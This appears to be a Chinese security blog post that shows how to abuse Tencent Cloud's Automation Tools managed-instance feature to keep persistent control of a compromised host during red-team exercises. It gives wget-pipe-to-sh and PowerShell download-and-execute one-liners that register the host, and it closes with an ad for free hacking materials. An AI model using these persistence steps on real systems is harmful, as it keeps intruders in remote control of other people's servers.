前言
剛好看到一個師傅分享了一個阿里雲ECS實戰攻防,然後想到了同樣利用騰訊雲CVM的託管亦可實現在實戰攻防中的許可權維持。
簡介
騰訊雲自動化助手(TencentCloud Automation Tools,TAT)是一個原生運維部署工具,它可以在不登入或輸入密碼的情況下,實現對雲伺服器 CVM 和輕量應用伺服器 Lighthouse 的自動化遠端操作。該工具支援批次執行命令,包括 Shell、PowerShell 及 Python 等,能夠完成一系列自動化運維任務,如執行自動化指令碼、輪詢程序、安裝/解除安裝軟體、更新應用及安裝補丁等。這樣的便利性使得企業可以更加高效地管理和維護其雲伺服器和輕量應用伺服器,從而提高其雲端計算服務的可靠性和安全性。
應用場景
上傳並執行自動化運維指令碼
執行常見操作任務
執行已儲存的指令碼
託管例項
控制檯->自動化助手->託管例項
許可權維持
使用預設數值即可,預設值的閾值設定和阿里雲的一致
例項建立成功後,可在客戶端執行命令
Linux命令
sudo wget -qO - https://xxxxxxxxx.cos.accelerate.myqcloud.com/tat_agent/tat_agent_register.sh | sudo sh -s -- ap-guangzhou b3ec8e08-d73a-40d8-83c4-7308101b00b6 be131e221d1749a6860a4e3a6e1b37415f1c867f2646436abb67e0998fa24883Windows
iex "& { $((New-Object System.Net.WebClient).DownloadString('https://xxxxxxxxx.cos.accelerate.myqcloud.com/tat_agent/tat_agent_register.ps1')) } ap-guangzhou b3ec8e08-d73a-40d8-83c4-7308101b00b6 be131e221d1749a6860a4e3a6e1b37415f1c867f2646436abb67e0998fa24883"執行命令後發現例項可託管成功,但是是離線狀態
【----幫助網安學習,以下所有學習資料免費領!加vx:dctintin,備註 “部落格園” 獲取!】
① 網安學習成長路徑思維導圖
② 60+網安經典常用工具包
③ 100+SRC漏洞分析報告
④ 150+網安攻防實戰技術電子書
⑤ 最權威CISSP 認證考試指南+題庫
⑥ 超1800頁CTF實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP客戶端安全檢測指南(安卓+IOS)
宿主伺服器安裝自動化助手客戶端
root@ubuntu:/home/ubuntu# sudo wget -qO - https://xxxxxxxxx.cos-internal.accelerate.tencentcos.cn/tat_agent/tat_agent_installer.sh | sudo sh
檢視探針狀態
ps -ef | grep tat_agent命令後,檢視程序狀態。如果程序不存在
/usr/local/qcloud/tat_agent/tat_agent // 啟動程序其實這裡的客戶端的探針類似於監聽狀態,一直線上,託管伺服器執行命令上線
執行命令
執行結果
執行時長48秒
檔案上傳
檔案上傳許可權等均可自定義。
小結
可以明顯發現執行時效性不是很流暢,但是優點兒在於:
託管許可權維持穩定
檔案上傳方便以及檔案許可權方便
更多網安技能的線上實操練習,請點選這裡>>